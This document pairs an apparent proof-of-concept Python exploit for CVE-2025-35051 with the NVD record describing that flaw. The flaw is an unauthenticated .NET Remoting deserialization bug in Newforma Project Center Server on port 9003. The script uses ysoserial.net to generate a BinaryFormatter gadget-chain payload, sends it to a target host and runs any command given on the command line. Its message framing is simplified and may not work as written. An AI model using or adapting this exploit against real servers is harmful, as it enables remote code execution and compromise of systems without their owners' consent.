CVE-2025-35051

# CVE-2025-35051 - Newforma Project Center Server .NET Remoting Deserialization RCE # Exploit using ysoserial.net to generate payload and send via TCP import socket import struct import subprocess import sys TARGET_HOST = "192.168.1.100" # Target NPCS server TARGET_PORT = 9003 # NPCS .NET Remoting port ENDPOINT = "/ProjectCenter.rem" def generate_payload(command): """Generate .NET deserialization payload using ysoserial.net""" # Use WindowsIdentity or PSObject gadget chain # Example: ysoserial.exe -g WindowsIdentity -f BinaryFormatter -c "<command>" cmd = [ "ysoserial.exe", "-g", "WindowsIdentity", "-f", "BinaryFormatter", "-c", command ] result = subprocess.run(cmd, capture_output=True) return result.stdout def send_remoting_request(payload): """Send malicious payload to .NET Remoting endpoint""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) # Construct .NET Remoting request header # The endpoint URI is embedded in the request uri = ENDPOINT.encode('utf-8') # Build the .NET Remoting message envelope # Prepend the serialized object with proper framing request = b"\x00\x00\x00\x00" + payload sock.send(request) response = sock.recv(4096) sock.close() return response except Exception as e: print(f"[ERROR] Connection failed: {e}") return None def exploit(command="calc.exe"): """Main exploit function""" print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}{ENDPOINT}") print(f"[*] Command to execute: {command}") payload = generate_payload(command) if payload: print(f"[+] Payload generated: {len(payload)} bytes") response = send_remoting_request(payload) if response: print("[+] Payload sent successfully") print(f"[+] Server response: {response[:100]}") else: print("[-] No response received") if __name__ == "__main__": cmd = sys.argv[1] if len(sys.argv) > 1 else "calc.exe" exploit(cmd)

{"cve": {"id": "CVE-2025-35051", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-09T21:15:35.873", "lastModified": "2026-04-26T19:04:18.887", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Newforma Project Center Server (NPCS) accepts serialized .NET data via the '/ProjectCenter.rem' endpoint on 9003/tcp, allowing a remote, unauthenticated attacker to execute arbitrary code with 'NT AUTHORITY\\NetworkService' privileges. According to the recommended architecture, the vulnerable NPCS endpoint is only accessible on an internal network. To mitigate this vulnerability, restrict network access to NPCS."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newforma:project_center:2024.3:*:*:*:*:*:*:*", "matchCriteriaId": "6F878C37-A9AB-4887-9F8E-BC2129CEF077"}]}]}], "references": [{"url": "https://projectcenter.help.newforma.com/overviews/info_exchange_overview/", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Product"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-282-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-35051", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory", "US Government Resource"]}]}}